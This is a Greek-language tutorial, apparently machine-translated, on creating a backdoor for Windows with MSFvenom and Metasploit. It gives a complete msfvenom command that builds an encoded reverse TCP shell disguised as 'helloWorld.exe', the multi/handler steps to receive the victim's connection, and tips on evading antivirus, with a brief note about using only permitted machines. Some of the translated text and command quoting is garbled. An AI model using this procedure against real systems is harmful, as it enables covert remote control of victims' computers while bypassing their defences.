Μια πίσω πόρτα χρησιμοποιείται για να παρακάμψει τους μηχανισμούς ασφαλείας, συχνά κρυφά και κυρίως μη ανιχνεύσιμα. Χρησιμοποιώντας το MSFvenom, το συνδυασμό msfpayload και msfencode, είναι δυνατό να δημιουργήσετε μια πίσω πόρτα που συνδέεται πίσω με τον εισβολέα χρησιμοποιώντας αντίστροφο κέλυφος TCP. Για να αναπτύξετε μια πίσω πόρτα, πρέπει να αλλάξετε την υπογραφή του κακόβουλου λογισμικού σας για να αποφύγετε οποιοδήποτε λογισμικό προστασίας από ιούς. Ολοκληρώστε αυτό το έργο σε ένα ζευγάρι υπολογιστών στους οποίους έχετε άδεια πρόσβασης και στην πορεία, θα μάθετε περισσότερα σχετικά με την ασφάλεια των υπολογιστών και πώς λειτουργεί αυτό το είδος της πίσω πόρτας.
Βήματα
Βήμα 1. Εκκινήστε το Kali και ενεργοποιήστε την κονσόλα Terminal
Βήμα 2. Πληκτρολογήστε ifconfig για να εμφανίσετε τη διεπαφή και ελέγξτε τη διεύθυνση IP σας
Βήμα 3. Πληκτρολογήστε κωδικοποιητές msfvenom -l για να εμφανιστεί η λίστα των κωδικοποιητών
Ως κωδικοποιητής θα χρησιμοποιήσετε το x86/shikata_ga_nai
Βήμα 4. Πληκτρολογήστε "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --πλατφόρμα παράθυρα ορίζει αρχιτεκτονική προς χρήση.
- -p windows/shell/reverse_tcp ορίζει το ωφέλιμο φορτίο για ενσωμάτωση.
- Το LHOST ορίζει τη διεύθυνση IP του ακροατή.
- Το LPORT ορίζει τη θύρα ακρόασης.
- -b "\ x00" ορίζει την αποφυγή κακού χαρακτήρα (null bytes).
- -e x86/shikata_ga_nai ορίζει το όνομα κωδικοποιητή.
- -f exe> helloWorld.exe ορίζει έξοδο μορφής.
Βήμα 5. Πληκτρολογήστε msfconsole για να ενεργοποιήσετε το Metasploit
Τώρα έχετε δημιουργήσει την πίσω πόρτα σας. Όταν το θύμα κάνει κλικ στο helloWorld.exe, το ωφέλιμο φορτίο του κελύφους που είναι ενσωματωμένο θα ενεργοποιηθεί και θα κάνει μια σύνδεση πίσω στο σύστημά σας. Για να λάβετε τη σύνδεση, πρέπει να ανοίξετε το πολυ-χειριστή στο Metasploit και να ορίσετε το ωφέλιμο φορτίο
Βήμα 6. Πληκτρολογήστε use exploit/multi/handler
Βήμα 7. Πληκτρολογήστε set payload windows/shell/reverse_tcp
Βήμα 8. Πληκτρολογήστε επιλογές εμφάνισης για να ελέγξετε τη μονάδα
Βήμα 9. Πληκτρολογήστε το σύνολο LHOST 192.168.48.129
Το "LHOST" ορίζει τη διεύθυνση IP του ακροατή
Βήμα 10. Πληκτρολογήστε σύνολο LPORT 4444
Το "LPORT" ορίζει τη θύρα ακρόασης
Βήμα 11. Πληκτρολογήστε εκτέλεση και περιμένετε τη σύνδεση από το μηχάνημα του θύματος
Βήμα 12. Περιμένετε να κάνει κλικ το θύμα στο helloWorld.exe
Στη συνέχεια, θα συνδεθείτε επιτυχώς με τη μηχανή του θύματος.
Συμβουλές
- Η χρήση του -i στο MSFvenom θα αντιπροσωπεύει τις επαναλήψεις της κωδικοποίησης. Μερικές φορές περισσότερες επαναλήψεις μπορεί να βοηθήσουν στην αποφυγή του λογισμικού AV.
- Έχετε μάθει πώς να δημιουργείτε την πίσω πόρτα και να κωδικοποιείτε χρησιμοποιώντας το MSFvenom, αλλά αυτή η μέθοδος δεν θα λειτουργήσει τέλεια ενάντια σε ορισμένα από τα λογισμικά AV στις μέρες μας. Ο λόγος πίσω από αυτό είναι τα πρότυπα εκτέλεσης στο MSFvenom. Οι προμηθευτές AV έχουν προσθέσει τη στατική υπογραφή αυτών των προτύπων και απλά τα αναζητούν. Η λύση για αυτό το ζήτημα είναι να χρησιμοποιήσετε διαφορετικό πρότυπο εκτέλεσης ή διαφορετικά εργαλεία.